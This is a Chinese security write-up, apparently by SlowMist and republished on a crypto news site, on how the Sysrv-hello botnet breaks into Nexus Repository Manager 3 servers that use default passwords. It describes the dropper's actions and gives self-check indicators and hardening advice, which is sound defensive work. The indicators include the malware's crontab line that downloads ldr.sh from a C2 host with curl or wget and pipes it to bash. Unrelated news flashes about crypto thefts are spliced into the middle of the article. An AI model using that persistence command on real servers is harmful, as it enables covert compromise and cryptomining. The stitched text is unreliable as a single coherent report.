TOR:慢雾：技术拆解 Sysrv-hello 僵尸网络入侵原理_TORJ币

作者：

时间：1900/1/1 0:00:00

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击，Maven私服部署会用到NexusRepositoryManager3，由于Maven是个流行服务，所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时，Sysrv-hello就可以直接扫描入侵，利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

慢雾：过去一周加密领域因安全事件累计损失3060万美元:7月24日消息，据慢雾统计，上周加密领域因遭遇攻击累计损失3060万美元，攻击者利用了不同的攻击向量。这些事件包括Alphapo热钱包被盗（损失2300万美元）、Conic Finance遭闪电贷攻击（损失30万美元）以及重入攻击（损失320万美元）、GMETA发生RugPull（损失360万美元）、BNO遭闪电贷攻击（损失50万美元）等。[2023/7/24 15:55:56]

入侵到服务器后会自动下载执行ldr.sh文件，该文件主要功能：1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿，文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

慢雾：Transit Swap黑客攻击交易被抢跑，套利机器人获利超100万美元:10月1日消息，据慢雾安全团队情报，Transit Swap 黑客转移用户 BSC 链 BUSD 资产时被套利机器人抢跑，区块高度为21816885，获利107万BUSD。套利机器人相关地址列表如下：0xa957...70d2、0x90b5...8ff4、0xcfb0...7ac7、

截止到目前，在各方的共同努力下，黑客已将 70% 左右的被盗资产退还到Transit Swap开发者地址，建议套利机器人所属人同样通过service@transit.finance或链上地址与Transit Swap取得联系，共同将此次被盗事件的受害用户损失降低到最小。[2022/10/2 18:37:44]

第二个木马sysrv的主要功能：1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播，随机扫描其他IP服务，同样进行NexusRepositoryManager3漏洞利用，同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

慢雾：疑似Gemini相关地址在过去5小时内共转出逾20万枚ETH:金色财经消息，慢雾监测显示，疑似加密交易所Gemini相关地址（0xea3ec2a08fee18ff4798c2d4725ded433d94151d）已在过去5小时内归集并转出逾20万枚ETH（超3亿美元）。[2022/7/19 2:22:08]

自查方法

进程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上这些，停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问，严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后，重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力，存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明：作为区块链信息平台，本站所发布文章仅代表作者个人观点，与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考，并非作为或被视为实际投资建议。

本文来源于非小号媒体平台：

慢雾科技

现已在非小号资讯平台发布68篇作品，

非小号开放平台欢迎币圈作者入驻

入驻指南：

/apply_guide/

本文网址：

/news/9606255.html

免责声明：

1.资讯内容不构成投资建议，投资者应独立决策并自行承担风险

2.本文版权归属原作所有，仅代表作者本人观点，不代表非小号的观点或立场

上一篇：